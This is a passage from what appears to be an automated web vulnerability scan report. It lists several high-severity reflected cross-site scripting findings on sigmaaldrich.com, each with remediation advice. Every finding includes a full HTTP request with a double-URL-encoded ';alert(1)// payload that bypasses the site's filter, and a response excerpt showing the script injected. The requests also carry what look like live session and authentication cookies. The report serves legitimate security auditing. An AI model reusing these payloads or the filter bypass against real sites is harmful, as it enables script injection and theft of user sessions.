The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs3b06d%2522%253balert%25281%2529%252f%252fa426dcb6558/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:09 GMT
Content-Length: 29015
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs3b06d";alert(1)//a426dcb6558/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.324. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 580ec%2522%253balert%25281%2529%252f%252f62f97b72205 was submitted in the REST URL parameter 4. This input was echoed as 580ec";alert(1)//62f97b72205 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma580ec%2522%253balert%25281%2529%252f%252f62f97b72205/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:17 GMT
Content-Length: 29015
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma580ec";alert(1)//62f97b72205/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.325. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81f26%2522%253balert%25281%2529%252f%252fecdb5f9605b was submitted in the REST URL parameter 5. This input was echoed as 81f26";alert(1)//ecdb5f9605b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma/General_Information81f26%2522%253balert%25281%2529%252f%252fecdb5f9605b/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:21 GMT
Content-Length: 29015
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma/General_Information81f26";alert(1)//ecdb5f9605b/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.326. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/vol4-issue2-proteomics.Par.0001.File.tmp/vol4-issue2-proteomics.pdf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff54b%2522%253balert%25281%2529%252f%252fe973efaf915 was submitted in the REST URL parameter 6. This input was echoed as ff54b";alert(1)//e973efaf915 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma/General_Information/ff54b%2522%253balert%25281%2529%252f%252fe973efaf915/vol4-issue2-proteomics.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:27 GMT
Content-Length: 28975
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma/General_Information/ff54b";alert(1)//e973efaf915/vol4-issue2-proteomics.pdf","E404") ;
   </script>
...[SNIP]...

1.327. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8592a%2522%253balert%25281%2529%252f%252f7f2b26672c6 was submitted in the REST URL parameter 1. This input was echoed as 8592a";alert(1)//7f2b26672c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc8592a%2522%253balert%25281%2529%252f%252f7f2b26672c6/medialib/docs/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:24 GMT
Content-Length: 29019
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc8592a";alert(1)//7f2b26672c6/medialib/docs/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf","E404") ;
   </script>
...[SNIP]...

1.328. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
